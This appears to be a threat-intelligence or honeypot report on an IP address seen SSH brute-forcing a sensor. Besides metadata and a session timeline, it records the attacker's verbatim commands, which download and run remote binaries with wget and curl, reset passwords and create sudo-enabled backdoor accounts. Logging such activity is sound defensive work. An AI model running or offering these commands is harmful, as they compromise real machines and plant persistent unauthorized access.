35.221.50.30

TAGGED MALICIOUS
Threat Confidence
62%
Location
🇺🇸 US / Washington
ASN
AS396982 · Google LLC
Cloud Provider
Total Events
311
Above average by volume
Agent Count
1
First / Last Seen
2026-06-01 04:42 — 2026-06-01 04:46
Attack Types
ssh:bruteforce
MITRE ATT&CK Techniques
Reconnaissance
Initial Access
Execution
Defense Evasion
Credential Access
Discovery
Command and Control
External Corroboration
Blocklist.de
Reported 2026-06-01 05:01
blocklist_de:reported
DShield Top Attackers
Reported 2026-06-01 05:01
dshield:top_attacker
Session Forensics
scanner ×1, reconnaissance ×1, malware_dropper ×1, credential_probe ×3, interactive_operator ×4, opportunistic_bruter ×3
Sessions
13 (9 with login)
Avg Depth Score
0.57
Commands Executed
142
Files Downloaded
1
Notable Commands
  • echo 'Password' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):Password > /tmp/mew' 2>/dev/null || (cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):Password > /tmp/mew)
  • whoami
  • cd /tmp
  • ulimit -n 1020000
  • rm -rf meow*
  • wget http://35.237.91.38/meow
  • curl -O http://35.237.91.38/meow
  • chmod 777 meow
  • ./meow
  • echo '123456789' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):123456789 > /tmp/mew' 2>/dev/null || (cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):123456789 > /tmp/mew)
  • echo '111111' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):111111 > /tmp/mew' 2>/dev/null || (cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):111111 > /tmp/mew)
  • echo '112233' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):112233 > /tmp/mew' 2>/dev/null || (cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):112233 > /tmp/mew)
  • echo '000000' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):000000 > /tmp/mew' 2>/dev/null || (cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):000000 > /tmp/mew)
  • echo '1234' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):1234 > /tmp/mew' 2>/dev/null || (cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):1234 > /tmp/mew)
Fingerprints
SSH-2.0-Go
Evidence Timeline
Credential Probe d23f524de638 newark_01 · 2026-06-01 04:42
1 20%
Credential Probe b0a6454f482e newark_01 · 2026-06-01 04:42
1 20%
Credential Probe 622cf4d443f0 newark_01 · 2026-06-01 04:42
1 20%
Interactive Operator aa13fb1e850b newark_01 · 2026-06-01 04:42
28 1 90%
Interactive Operator 516115bda449 newark_01 · 2026-06-01 04:42
28 1 90%
Malware Dropper 46a0fc76d2e9 newark_01 · 2026-06-01 04:42
26 1 1 100%
Interactive Operator a253f5c63d3f newark_01 · 2026-06-01 04:42
28 1 90%
Reconnaissance ea333e16b62b newark_01 · 2026-06-01 04:42
4 1 60%
Interactive Operator b548d75475f8 newark_01 · 2026-06-01 04:42
28 1 90%
Opportunistic Bruter 78fb1bb524a6 newark_01 · 2026-06-01 04:42
1 50%
Opportunistic Bruter 57f15baa8ee7 newark_01 · 2026-06-01 04:42
1 50%
Opportunistic Bruter a0341f27daf2 newark_01 · 2026-06-01 04:42
1 50%
Scanner babc7f8aa599 newark_01 · 2026-06-01 04:42
15%